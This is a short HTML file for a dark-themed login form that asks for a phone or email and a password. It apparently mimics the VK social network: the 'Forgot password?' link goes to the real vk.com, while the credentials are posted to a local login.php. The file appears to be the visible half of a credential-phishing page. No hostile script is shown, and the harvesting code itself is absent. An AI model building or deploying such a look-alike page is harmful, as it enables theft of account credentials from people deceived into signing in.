<!DOCTYPE html>

<html>
<body bgcolor="#1a1a1a">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
img {
	width: 40px;
	margin: 20px;
	}

input {
	padding: 12px 70px;
	margin: 5px;
	border: 1px solid gray;
	border-radius: 10px;
	background-color: #262626;
	color: white;
	font-weight: bold;
	}
	
input:focus {
	border: 1.5px solid #008ae6;
	}
	
button {
	padding: 8px 140px;
	border: none;
	border-radius: 10px;
	margin: 10px;
	color: black;
	background-color: white;
	}
	
a {
	text-decoration: none;
	color: #008ae6;
	font-family: sans-serif;
	}
</style>
<center>
<img src="Image/image.png"/><br>
<form method="POST" action="login.php">	
<br><br>
<input type="text" name="username" placeholder="Phine or email"></input><br>
<input type="password" name="password" placeholder="Password"></input><br>
<button type="submit"><b>Log in</b></button><br>
<a href="https://www.vk.com">Forgot password?</a><br><br><br>
</form>
</center>
</body>
</html>
